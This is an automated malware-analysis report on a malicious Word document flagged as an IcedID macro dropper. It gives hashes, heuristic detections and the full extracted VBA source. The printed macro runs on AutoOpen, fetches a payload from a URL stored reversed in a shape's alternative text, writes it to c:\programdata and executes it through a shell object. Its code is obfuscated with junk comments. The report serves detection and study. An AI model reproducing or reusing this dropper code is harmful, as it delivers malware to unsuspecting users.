Office (OOXML) malware analysis — malicious · b89eae0a6f89b6c1

MALICIOUS

Office (OOXML)

97.7 KB Created: 2020-10-13 10:40:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: 503ddc5b185bb653afefe9555092f48b SHA-1: ca2788e32e6016b36f9fb445673a805179928047 SHA-256: b89eae0a6f89b6c19befb9914113cb2f72d194f5c017035ad384f0eef27ba879

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set yMhMp = CreateObject("Script" + gDSfv)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	12102 bytes
SHA-256: `0378f11cee1876a996d132bc240d22fd43508421d81342acb7166efbb7d42be8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "qKlAh" Sub Pwibp(BcgzQ, Optional ByVal IXkXi As String = "c:\programdata\LtGep.txt", Optional ByVal gDSfv As String = "ing.FileSystemObject") ' Glaciers cliches prescriptivism cannons towering partner ' Reunions broom molesters ' Horror ' Protectiveness clang publicly regents ' Circumscribing marching wigeons declassified ' Twisted lubbers emphatically starless subtitled ' Pawing midships intruders kindling refrain ' Lidless ox unburned slows authorise ' Gnawed singed whirring cheapest overtaken ' Parcels ' Surpassed unvisitable ' Delphi orthogonality frivol freaked expedition pour ' Officiated prosecutes installed ' Indirect discomforts pulses bogged ' Carnage courageous ' Megatons pathologically chunnel ' Cadences delusional aquarium ' Accelerometer wiper nudging cheater Set yMhMp = CreateObject("Script" + gDSfv) ' Thickset ' Bipeds diagonalises expire stint ' Recites ' Debts provable statements diphthongs Set SSDPU = yMhMp.CreateTextFile(IXkXi) ' Floppiest midges thinking froward ' Plagued shriek ' Astrophysicists ' Healed jumps rummaged crowds ' Uncurled mailer SSDPU.WriteLine BcgzQ ' Lefthandedness mirrors bestiality ' Reunification succeeding ' Pariahs ' Stabilising sables mechanic ' Forefinger goading ' Teammate medicines decamped ' Dwarves SSDPU.Close ' Fearlessness voters ' Devoured prostitute ' Woodcut cues worshipful excellencies ' Tragedies must schwa waif ' Opportunist buttoning blond drafters ' Redeploying daemon insignificance alterego ' Slavering barmaid plaza network ' Unresponsive thoughtlessness ' Cleanliness polytheistic impotence mealy ' Steed misgiving shilling sieve townsfolk begins ' Piety transformed ' Invocation ' Diverse ' Grassier childproof ancestral hundredweight structurally crustiest ' Distally folds ' Outbuildings furtive limbo ' Els ' Francs marls annexation haltingly bookworms nymphs ' Aperture ' Antiquities rosettes owning ' Traumatised speaks meaninglessly exacerbates bored ' Scars cant lows ' Marketing unlearn panther attach wimp ' Petered appals springbok ' Night message ' Napalm blazed flotsam ' Unselfish magnetisation sorrowfully ' Costarring cloning ' Perverseness rumbas realised haloed mule ' Contiguity handovers corked stoppered allurements ' Rustled ' Superhuman fluttered temporary epitaph coquettishly unnoticed ' Expansions reiterate tycoons incriminates therapy substrate ' Qualifiers transmits rejuvenated people yawned End Sub ' Violates resemblance ' Endowment annal racialism fabricating adjudicators ' Polarity ' Ales corduroy reliably ' Transcript ' Rifled sounds undecided fanfare autonomic Sub AutoOpen() ' Release ' Decompress overindulgent reared ' Abnegation interceded herald ' Meaningfulness disadvantageously ' Bookmarks impels bout conurbations ' Fancied expertness prostitutes byproducts nervously ' Miniskirt punt executable perceive druids defrost ' Discreetly permeate armholes sprites ' Slenderness untangling ' Simulates chaldron unallocated dad lobbying checkin ' Jackdaws extrapolation grind picked upland managed athletically ' Sealed spooled bilingual ' Insinuated vaccinated prosperity national ' Sugary elastin fulllength scintillators recurs calmer ' Nourish pains ' Tremendous insolvency cheeriest expresses throb ' Unconnected avoidance ' Philology gamekeepers loggerheads asocial ' Transitively disrespectfully pained poseurs ' Royalists alluring ' Leipzig rafting coughing heats ' Mileages scantiness ' Geek contingency disintegration ' Prevention apostates accredited housekeeping ' Sorcerer signaller photometrically ' Vertebra radiators Dim dGgXs As New iekTC ' Playfellows scarcely reverberations ' Carboxyl camomile wides epitomises ' Octaves noiseless accented milord ' Situationist simplistic ewes bulwarks ' Robotic ' Correlation pantheistic legionary treatable ' Cowhand collarless fairs BcgzQ = dGgXs.qyItw("MSXML2.serverXMLHTTP") ' Bung commune accelerometer appointments catches subtracts ' Underwood heart mosaics ' Forbear icicles greatcoat severer ' Debuts evacuation mistreat baffles ' Separately monaco riotously ' Wrist ' Cliffs cannonballs deadlocks baobabs Pwibp oHFrs(BcgzQ) ' Somnambulist spit flareup ' Viva prospering lisbon ' Callus ' Commending bibliographical ' Weapons indaba gadded ' Commemorating heartwarming babas lido hyphenate ' Entertains demur ' Mistranslating ' Crisply invokable ' Typographer kleptomaniac entirety ' Caveman rich lump fiord workshops ' Pessimistically typify ' Sifts contrarily sensationalism ' Lights auditions ' Gelatinous selenium burns TSAAx ICfFi(0) + "vr32 c:\programdata\LtGep.txt", "ws" End Sub Function OSvvN(mlBGV, gybZF) ' Underpay guest ' Lurched subscripts ' Professionally ' Needles banquet doodling ' Disappointed regionalisation affable pageantry bleeper ' Predilection officiated orphaned viewfinder OSvvN = Split(mlBGV, gybZF) End Function Attribute VB_Name = "Ozgaj" ' Adherence ' Hives denominators potently ' Zoos ' Bigger winter baulking slipped Function oHFrs(Xfejj) ' Interracial ramifies volts ' Cassocks provincial housing emissions leans hurdle ' Intensity resiting ambulances ' Lighting namely ' Moats superimpose oHFrs = StrConv(Xfejj, vbUnicode) ' Insulators scourge levelling ' Scours harvest neutrino atomic ' Romanticism acquiescing readjustment frontline ' Unknowns deconstructive ' Parabolas jockeying franked transact End Function ' Cadets monumental pervasiveness grasp ' Laconically polyhedron ' Byelection excursion promontories ' Beatitudes cliquey geologically ' Colourised Function QanMi() ' Submitted prospectively debugged escapes tipsters insecure ' Branding relativist cairns tinpot fishhook fathers ' Wittily seminars tutored gotten journalist ' Coloure armlets ' Overdrawn gregariously focusing straddles hillocks bookings ' Hurtful jest ' Ignoring microcode anniversary ' Grisliest saucy ' Active maned tied ' Optimal microlight price autosuggestion virginity polishings botany ' Repetition acknowledgment spacesuit glutinous acceptance beggary With ActiveDocument.shapes(1) QanMi = .AlternativeText End With End Function ' Waywardness ' Medals creek sender palsy doctored ' Clearness morons ' Sightings uninsured chicks ' Happily hefty waitress socialists distinguished colt hydrocarbons ' Article capitalised Function ICfFi(yPAjb) ' Cygnet juicy ' Obstructions decoying ' Centenarians rerouted panjandrum breadandbutter ' Graders vocalise corrective ' Amputated leaderships wine agonies comport clothespeg ' Predictive roars bloodstains ' Scrutineers palaeontology carelessly lots sweetie ' Extinction reclassified ringleader monition ' Foursome acclaims spikes ' Unbelieving substantive agony OPxbM = QanMi() zKbzO = OSvvN(OPxbM, "###") gmFFC = zKbzO(yPAjb) ICfFi = gmFFC End Function Attribute VB_Name = "iekTC" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Lamas warps part creme ingenuousness ' Pine sisterly tautologous shakeup ' Electrolytes bedsheets childhoods ' Regrettable miscomprehended brandish ' Captious unfixed Function qyItw(cqZts) ' Welding stringy escorts ' Mummy interims incorrectly proactive ' Staleness rescuer aridity ' Bladed hisses aphorisms tediousness unvisitable arbitral ' Milieux adulterations Dim KOaJL As Object ' Honking musketeer ' Subtractive timeless outpouring readiest ' Tracks mindbogglingly ' Distil glassier stencilled fags ' Frog legislatures whoa spotlight ' Apogee stowaway ancients opened conversations ' Penitents sugarplums phonemically collage ' Stenches activations restrains ' Burped ' Butchery Set KOaJL = CreateObject(cqZts) ' Doffed clergy hark dewy whippet therewith boron ' Builders omnipresent bloke ' Quiescence coefficient gobbets levered ' Springboks ' Ephemera auk competently restaurateur heterosexist stray ' Dipolar undermining lamed personification dethroned ' Quotes divisibility incapacitate cadaverous megabytes ' Illegibility ' Earthly crumpet shrew empiric navels zebu ' Gutless revivifying shakes regenerate cud misstatement deflation ' Overdubbing ' Toothiest grouch florid beachcomber ' Compensator waxpaper milked imaginable unlicensed ' Hails hangouts ' Muteness climatological astonishes ' Incest hillwalking criminologists lifeguards graduates ' Bind exceed ' Belligerents designable ' Hindquarters estimated unloose shallows got ' Unfortunately cancerous inferring rigor ' Enticement malignantly ' Renaming coastlands poorness neediest Rqnxo = ICfFi(1) ' Tempter policies infernally honeycombed ' Tailless furious ' Computable dehydrating invectives ' Felicity dessicated KOaJL.Open "GET", Reverse(Rqnxo), False ' Distractedly shield ' Solely alloyed shuddered ' Cuckoos seared ' Bounding plunderers KOaJL.Send ' Bailed pipelines usurping ' Sacs reeds ' Fragmenting orthographically ' Weedkiller goofy sieve necrophiliacs ' Bartender assyria exegesis metamorphosis aurorae ' Sensationalistic screened feinting discussed ' Herbalist photogenic pope qyItw = KOaJL.responsebody End Function Attribute VB_Name = "nkmqO" Sub TSAAx(fDhKw, pqKEC) ' Unclasped coercively symmetrising addenda ' Climates quenching ordinals ' Roofing walkout immovable ' Seduced godsend ' Marriage bamboo parliament ' Pandora cockatrices distended appending ' Puss mismatched Set naxvj = CreateObject(pqKEC + "cript.shell") ' Woodshed advanced buffer daydreaming ' Bakehouse offence handicrafts removals entangler ' Pronunciations unhyphenated mouth ' Radiograph extorted plaits bridles ' Nonsenses moan terrapin glean ' Jetsam carry ' Rota overseen none dazed ' Poach relativistic zone ' Distillations highranking formerly signers ' Hinderer reflexive casually ' Serpent deterioration shack ' Axle penname crete flounced leftish ' Parenthesis taxonomy held ' Invitations corruptions denomination ' Conformational obtrusive unappeased bedmaker ' Bag creditors inducts bathtubs spectres ' Bead ignores turkish comradeinarms contain ' Proteges tipper ' Marshaller ' Brimstone crudity ' Causes stewardesses inscrutable complexes shuttering elbe ' Querying drenching might packhorse ' Quagga assigned ' Riskiness lineages storehouses ' Polishing sockets sonata ' Souled footway persistent fathomed ' Pajamas sweaters effete sling coining ' Unresisting bearskin ' Relishes enjoyer touches positive tracheal ' Surrounding backless bumper zoology codices drummer ' Militating undemocratic refreshments recapture ' Immortal iraqi activists baud ' Subordinating liberators ' Fuddled radish ' Cubs reason ' Greener flareup ' Birdsong understate announced scherzi ' Strangulation exotic ' Affront neophyte unfashionably ' Genially emerge ' Overexposed conferences telecommuting ' Lam pardoning ' Piccolo mudlarks sane flossing gad ' Cinematic matrimonial tuna snowed chants herons ' Wasting retitle catamarans semiconductors chairman ' Drowsy hooted ' Coquettishly ' Peerless screenwriter vandalising clasper gazebo lambs naxvj.exec fDhKw ' Sos diminution mothering ileum unfertilised railed ' Colonising hydrodynamical meson ' Bootless dungeon inseparable jumpstart scribbles ' Recess flyers extrapolate End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	45056 bytes
SHA-256: `1b34b1f53cf9e9102c4abbe86f07182cee2377aa2f296babde54f9531773b84a`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.